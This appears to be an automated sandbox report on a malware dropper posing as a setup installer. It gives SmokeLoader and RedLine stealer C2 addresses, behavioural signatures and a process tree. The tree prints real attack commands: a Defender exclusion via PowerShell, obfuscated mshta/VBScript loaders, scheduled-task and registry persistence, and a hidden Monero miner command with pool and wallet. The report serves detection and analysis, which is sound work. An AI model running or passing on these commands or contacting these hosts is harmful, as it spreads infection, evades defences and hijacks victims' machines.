Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
13-10-2021 18:35
211013-w8lxmaegdr 1013-10-2021 12:38
211013-pvkdbadhdm 1013-10-2021 05:30
211013-f7nrtsdfa3 1012-10-2021 20:25
211012-y7qwasdbh4 1011-10-2021 21:02
211011-zvywtaabdq 10Analysis
-
max time kernel
31s -
max time network
1800s -
platform
windows7_x64 -
resource
win7-ja-20210920 -
submitted
13-10-2021 05:30
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-de-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
3.4MB
-
MD5
26f28bf2dc2b6afc0dd99cb6ea3879b8
-
SHA1
9270b9f48e2d14cc2cbed61ee2e2389d5f69ce05
-
SHA256
5f30eae71c1b0d08e7ec5adfc9a0dc98078595502b60a584a8df5cdf8cacf7fa
-
SHA512
5a350373e87673c9ba39e5353bea1d7c1f2f7bc62a703ed13e892e69037008f3e2accadbdd0ec0bd976e54c68b79dfad6fb37517dd55448cac4d9d74ae8a037b
Malware Config
Extracted
smokeloader
2020
http://gmpeople.com/upload/
http://mile48.com/upload/
http://lecanardstsornin.com/upload/
http://m3600.com/upload/
http://camasirx.com/upload/
Extracted
redline
ANI
45.142.215.47:27643
Extracted
redline
media12
91.121.67.60:2151
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 8 IoCs
resource yara_rule behavioral1/memory/2096-230-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/2104-231-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/2104-238-0x000000000041B236-mapping.dmp family_redline behavioral1/memory/2096-237-0x000000000041B23A-mapping.dmp family_redline behavioral1/memory/2104-236-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/2096-235-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/2104-234-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/2096-233-0x0000000000400000-0x0000000000422000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
resource yara_rule behavioral1/files/0x000500000001267c-70.dat aspack_v212_v242 behavioral1/files/0x000500000001267c-71.dat aspack_v212_v242 behavioral1/files/0x0006000000012634-72.dat aspack_v212_v242 behavioral1/files/0x0006000000012634-73.dat aspack_v212_v242 behavioral1/files/0x00050000000126a2-76.dat aspack_v212_v242 behavioral1/files/0x00050000000126a2-77.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 14 IoCs
pid Process 1600 setup_installer.exe 1888 setup_install.exe 1804 Mon206b909958ed4.exe 1816 Mon20762bc3f6.exe 1856 Mon20927aab1e5.exe 1636 Mon209c830507d573.exe 1260 Mon209b3da1556b9a317.exe 1728 Mon2083f8d8970a0b2d.exe 2016 Mon206d48916f93c5.exe 1520 Mon204014f13870f5e.exe 1448 Mon20d3b8b752.exe 1864 Mon20b6f9d5bd03a305.exe 1808 Mon203f01ac7e6.exe 1520 09xU.exE -
Loads dropped DLL 50 IoCs
pid Process 1148 setup_x86_x64_install.exe 1600 setup_installer.exe 1600 setup_installer.exe 1600 setup_installer.exe 1600 setup_installer.exe 1600 setup_installer.exe 1600 setup_installer.exe 1888 setup_install.exe 1888 setup_install.exe 1888 setup_install.exe 1888 setup_install.exe 1888 setup_install.exe 1888 setup_install.exe 1888 setup_install.exe 1888 setup_install.exe 1956 cmd.exe 1616 cmd.exe 1616 cmd.exe 1712 cmd.exe 1712 cmd.exe 1684 cmd.exe 604 cmd.exe 604 cmd.exe 1764 cmd.exe 1764 cmd.exe 1856 Mon20927aab1e5.exe 1856 Mon20927aab1e5.exe 1816 Mon20762bc3f6.exe 1816 Mon20762bc3f6.exe 1708 cmd.exe 1708 cmd.exe 1804 Mon206b909958ed4.exe 1804 Mon206b909958ed4.exe 560 cmd.exe 1636 Mon209c830507d573.exe 1636 Mon209c830507d573.exe 1760 cmd.exe 1520 Mon204014f13870f5e.exe 1520 Mon204014f13870f5e.exe 1448 Mon20d3b8b752.exe 1448 Mon20d3b8b752.exe 1240 cmd.exe 1588 cmd.exe 1808 Mon203f01ac7e6.exe 1808 Mon203f01ac7e6.exe 1300 postback.exe 1520 09xU.exE 1520 09xU.exE 1856 Mon20927aab1e5.exe 1636 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 13 ip-api.com 33 ipinfo.io 34 ipinfo.io -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 2852 1448 WerFault.exe 47 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon204014f13870f5e.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon204014f13870f5e.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon204014f13870f5e.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2608 schtasks.exe 2116 schtasks.exe 320 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1828 timeout.exe -
Kills process with taskkill 2 IoCs
pid Process 2072 taskkill.exe 2116 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 35 IoCs
pid Process 1520 Mon204014f13870f5e.exe 1520 Mon204014f13870f5e.exe 1364 Process not Found 1364 Process not Found 1364 Process not Found 1364 Process not Found 1364 Process not Found 1364 Process not Found 1364 Process not Found 1364 Process not Found 1364 Process not Found 1364 Process not Found 1364 Process not Found 1364 Process not Found 1364 Process not Found 1364 Process not Found 1364 Process not Found 1448 Mon20d3b8b752.exe 1448 Mon20d3b8b752.exe 1448 Mon20d3b8b752.exe 1448 Mon20d3b8b752.exe 1448 Mon20d3b8b752.exe 1448 Mon20d3b8b752.exe 1448 Mon20d3b8b752.exe 1448 Mon20d3b8b752.exe 1448 Mon20d3b8b752.exe 1448 Mon20d3b8b752.exe 1448 Mon20d3b8b752.exe 1448 Mon20d3b8b752.exe 1448 Mon20d3b8b752.exe 1448 Mon20d3b8b752.exe 1364 Process not Found 1448 Mon20d3b8b752.exe 1448 Mon20d3b8b752.exe 1448 Mon20d3b8b752.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1520 09xU.exE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1260 Mon209b3da1556b9a317.exe Token: SeDebugPrivilege 2016 Mon206d48916f93c5.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1148 wrote to memory of 1600 1148 setup_x86_x64_install.exe 28 PID 1148 wrote to memory of 1600 1148 setup_x86_x64_install.exe 28 PID 1148 wrote to memory of 1600 1148 setup_x86_x64_install.exe 28 PID 1148 wrote to memory of 1600 1148 setup_x86_x64_install.exe 28 PID 1148 wrote to memory of 1600 1148 setup_x86_x64_install.exe 28 PID 1148 wrote to memory of 1600 1148 setup_x86_x64_install.exe 28 PID 1148 wrote to memory of 1600 1148 setup_x86_x64_install.exe 28 PID 1600 wrote to memory of 1888 1600 setup_installer.exe 29 PID 1600 wrote to memory of 1888 1600 setup_installer.exe 29 PID 1600 wrote to memory of 1888 1600 setup_installer.exe 29 PID 1600 wrote to memory of 1888 1600 setup_installer.exe 29 PID 1600 wrote to memory of 1888 1600 setup_installer.exe 29 PID 1600 wrote to memory of 1888 1600 setup_installer.exe 29 PID 1600 wrote to memory of 1888 1600 setup_installer.exe 29 PID 1888 wrote to memory of 984 1888 setup_install.exe 31 PID 1888 wrote to memory of 984 1888 setup_install.exe 31 PID 1888 wrote to memory of 984 1888 setup_install.exe 31 PID 1888 wrote to memory of 984 1888 setup_install.exe 31 PID 1888 wrote to memory of 984 1888 setup_install.exe 31 PID 1888 wrote to memory of 984 1888 setup_install.exe 31 PID 1888 wrote to memory of 984 1888 setup_install.exe 31 PID 1888 wrote to memory of 1956 1888 setup_install.exe 32 PID 1888 wrote to memory of 1956 1888 setup_install.exe 32 PID 1888 wrote to memory of 1956 1888 setup_install.exe 32 PID 1888 wrote to memory of 1956 1888 setup_install.exe 32 PID 1888 wrote to memory of 1956 1888 setup_install.exe 32 PID 1888 wrote to memory of 1956 1888 setup_install.exe 32 PID 1888 wrote to memory of 1956 1888 setup_install.exe 32 PID 1888 wrote to memory of 1616 1888 setup_install.exe 33 PID 1888 wrote to memory of 1616 1888 setup_install.exe 33 PID 1888 wrote to memory of 1616 1888 setup_install.exe 33 PID 1888 wrote to memory of 1616 1888 setup_install.exe 33 PID 1888 wrote to memory of 1616 1888 setup_install.exe 33 PID 1888 wrote to memory of 1616 1888 setup_install.exe 33 PID 1888 wrote to memory of 1616 1888 setup_install.exe 33 PID 1888 wrote to memory of 1712 1888 setup_install.exe 34 PID 1888 wrote to memory of 1712 1888 setup_install.exe 34 PID 1888 wrote to memory of 1712 1888 setup_install.exe 34 PID 1888 wrote to memory of 1712 1888 setup_install.exe 34 PID 1888 wrote to memory of 1712 1888 setup_install.exe 34 PID 1888 wrote to memory of 1712 1888 setup_install.exe 34 PID 1888 wrote to memory of 1712 1888 setup_install.exe 34 PID 1888 wrote to memory of 1708 1888 setup_install.exe 35 PID 1888 wrote to memory of 1708 1888 setup_install.exe 35 PID 1888 wrote to memory of 1708 1888 setup_install.exe 35 PID 1888 wrote to memory of 1708 1888 setup_install.exe 35 PID 1888 wrote to memory of 1708 1888 setup_install.exe 35 PID 1888 wrote to memory of 1708 1888 setup_install.exe 35 PID 1888 wrote to memory of 1708 1888 setup_install.exe 35 PID 1888 wrote to memory of 1588 1888 setup_install.exe 36 PID 1888 wrote to memory of 1588 1888 setup_install.exe 36 PID 1888 wrote to memory of 1588 1888 setup_install.exe 36 PID 1888 wrote to memory of 1588 1888 setup_install.exe 36 PID 1888 wrote to memory of 1588 1888 setup_install.exe 36 PID 1888 wrote to memory of 1588 1888 setup_install.exe 36 PID 1888 wrote to memory of 1588 1888 setup_install.exe 36 PID 1888 wrote to memory of 560 1888 setup_install.exe 37 PID 1888 wrote to memory of 560 1888 setup_install.exe 37 PID 1888 wrote to memory of 560 1888 setup_install.exe 37 PID 1888 wrote to memory of 560 1888 setup_install.exe 37 PID 1888 wrote to memory of 560 1888 setup_install.exe 37 PID 1888 wrote to memory of 560 1888 setup_install.exe 37 PID 1888 wrote to memory of 560 1888 setup_install.exe 37 PID 1888 wrote to memory of 1764 1888 setup_install.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1600 -
C:\Users\Admin\AppData\Local\Temp\7zS046F9976\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS046F9976\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:984
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:1132
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20762bc3f6.exe4⤵
- Loads dropped DLL
PID:1956 -
C:\Users\Admin\AppData\Local\Temp\7zS046F9976\Mon20762bc3f6.exeMon20762bc3f6.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1816
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon206b909958ed4.exe /mixone4⤵
- Loads dropped DLL
PID:1616 -
C:\Users\Admin\AppData\Local\Temp\7zS046F9976\Mon206b909958ed4.exeMon206b909958ed4.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1804 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{EP9v-AUqMR-wDYu-SFYjG}\48148754005.exe"6⤵
- Loads dropped DLL
PID:1636 -
C:\Users\Admin\AppData\Local\Temp\{EP9v-AUqMR-wDYu-SFYjG}\48148754005.exe"C:\Users\Admin\AppData\Local\Temp\{EP9v-AUqMR-wDYu-SFYjG}\48148754005.exe"7⤵PID:2932
-
C:\Users\Admin\AppData\Local\Temp\{EP9v-AUqMR-wDYu-SFYjG}\48148754005.exe"C:\Users\Admin\AppData\Local\Temp\{EP9v-AUqMR-wDYu-SFYjG}\48148754005.exe"8⤵PID:700
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{EP9v-AUqMR-wDYu-SFYjG}\78354988796.exe" /mix6⤵PID:2296
-
C:\Users\Admin\AppData\Local\Temp\{EP9v-AUqMR-wDYu-SFYjG}\78354988796.exe"C:\Users\Admin\AppData\Local\Temp\{EP9v-AUqMR-wDYu-SFYjG}\78354988796.exe" /mix7⤵PID:2460
-
C:\Users\Admin\AppData\Roaming\wowsfree\mopnns.exemopnns.exe8⤵PID:2452
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{EP9v-AUqMR-wDYu-SFYjG}\51307333001.exe" /mix6⤵PID:2540
-
C:\Users\Admin\AppData\Local\Temp\{EP9v-AUqMR-wDYu-SFYjG}\51307333001.exe"C:\Users\Admin\AppData\Local\Temp\{EP9v-AUqMR-wDYu-SFYjG}\51307333001.exe" /mix7⤵PID:2256
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\EBuSNWsQ & timeout 4 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{EP9v-AUqMR-wDYu-SFYjG}\51307333001.exe"8⤵PID:2720
-
C:\Windows\SysWOW64\timeout.exetimeout 49⤵
- Delays execution with timeout.exe
PID:1828
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"6⤵PID:2904
-
C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"7⤵PID:2188
-
C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"8⤵PID:1616
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Mon206b909958ed4.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS046F9976\Mon206b909958ed4.exe" & exit6⤵PID:2696
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20927aab1e5.exe4⤵
- Loads dropped DLL
PID:1712 -
C:\Users\Admin\AppData\Local\Temp\7zS046F9976\Mon20927aab1e5.exeMon20927aab1e5.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1856 -
C:\Users\Admin\AppData\Local\Temp\7zS046F9976\Mon20927aab1e5.exeC:\Users\Admin\AppData\Local\Temp\7zS046F9976\Mon20927aab1e5.exe6⤵PID:2096
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon204014f13870f5e.exe4⤵
- Loads dropped DLL
PID:1708 -
C:\Users\Admin\AppData\Local\Temp\7zS046F9976\Mon204014f13870f5e.exeMon204014f13870f5e.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:1520
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon203f01ac7e6.exe4⤵
- Loads dropped DLL
PID:1588 -
C:\Users\Admin\AppData\Local\Temp\7zS046F9976\Mon203f01ac7e6.exeMon203f01ac7e6.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1808 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS046F9976\Mon203f01ac7e6.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS046F9976\Mon203f01ac7e6.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )6⤵PID:1884
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS046F9976\Mon203f01ac7e6.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS046F9976\Mon203f01ac7e6.exe") do taskkill /F -Im "%~NxU"7⤵PID:1300
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
PID:1520 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )9⤵PID:2056
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"10⤵PID:2368
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )9⤵PID:2760
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I10⤵PID:2480
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "11⤵PID:2088
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"11⤵PID:2328
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Mon203f01ac7e6.exe"8⤵
- Kills process with taskkill
PID:2072
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon206d48916f93c5.exe4⤵
- Loads dropped DLL
PID:560 -
C:\Users\Admin\AppData\Local\Temp\7zS046F9976\Mon206d48916f93c5.exeMon206d48916f93c5.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2016 -
C:\Users\Admin\AppData\Roaming\3618611.scr"C:\Users\Admin\AppData\Roaming\3618611.scr" /S6⤵PID:2128
-
-
C:\Users\Admin\AppData\Roaming\5726936.scr"C:\Users\Admin\AppData\Roaming\5726936.scr" /S6⤵PID:2432
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵PID:3032
-
-
-
C:\Users\Admin\AppData\Roaming\3380869.scr"C:\Users\Admin\AppData\Roaming\3380869.scr" /S6⤵PID:2304
-
-
C:\Users\Admin\AppData\Roaming\2551149.scr"C:\Users\Admin\AppData\Roaming\2551149.scr" /S6⤵PID:2532
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon209c830507d573.exe4⤵
- Loads dropped DLL
PID:1764 -
C:\Users\Admin\AppData\Local\Temp\7zS046F9976\Mon209c830507d573.exeMon209c830507d573.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1636 -
C:\Users\Admin\AppData\Local\Temp\7zS046F9976\Mon209c830507d573.exeC:\Users\Admin\AppData\Local\Temp\7zS046F9976\Mon209c830507d573.exe6⤵PID:2104
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon2083f8d8970a0b2d.exe4⤵
- Loads dropped DLL
PID:604 -
C:\Users\Admin\AppData\Local\Temp\7zS046F9976\Mon2083f8d8970a0b2d.exeMon2083f8d8970a0b2d.exe5⤵
- Executes dropped EXE
PID:1728
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20d3b8b752.exe4⤵
- Loads dropped DLL
PID:1760 -
C:\Users\Admin\AppData\Local\Temp\7zS046F9976\Mon20d3b8b752.exeMon20d3b8b752.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1448 -
C:\Users\Admin\Pictures\Adobe Films\nsLsHFKdidFxTB9utWqd24Y5.exe"C:\Users\Admin\Pictures\Adobe Films\nsLsHFKdidFxTB9utWqd24Y5.exe"6⤵PID:2260
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1448 -s 14606⤵
- Program crash
PID:2852
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon209b3da1556b9a317.exe4⤵
- Loads dropped DLL
PID:1684 -
C:\Users\Admin\AppData\Local\Temp\7zS046F9976\Mon209b3da1556b9a317.exeMon209b3da1556b9a317.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1260 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:2148
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵PID:2408
-
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵PID:2468
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"7⤵PID:2560
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵PID:2600
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵PID:2432
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe"9⤵PID:2148
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe" /F10⤵
- Creates scheduled task(s)
PID:2608
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\10⤵PID:2064
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:2684
-
C:\Users\Admin\AppData\Local\Temp\is-30RI9.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-30RI9.tmp\setup.tmp" /SL5="$20194,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵PID:1072
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT9⤵PID:2448
-
C:\Users\Admin\AppData\Local\Temp\is-DH7DC.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-DH7DC.tmp\setup.tmp" /SL5="$3019A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT10⤵PID:2316
-
C:\Users\Admin\AppData\Local\Temp\is-RT4H4.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-RT4H4.tmp\postback.exe" ss111⤵
- Loads dropped DLL
PID:1300
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵PID:2160
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:2140
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:2116
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:1716
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:2184
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:320
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:1320
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:2652
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20b6f9d5bd03a305.exe4⤵
- Loads dropped DLL
PID:1240 -
C:\Users\Admin\AppData\Local\Temp\7zS046F9976\Mon20b6f9d5bd03a305.exeMon20b6f9d5bd03a305.exe5⤵
- Executes dropped EXE
PID:1864
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {DA86989E-9599-45EC-A5F5-876384F7CC7E} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1348
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Mon206b909958ed4.exe" /f1⤵
- Kills process with taskkill
PID:2116
-
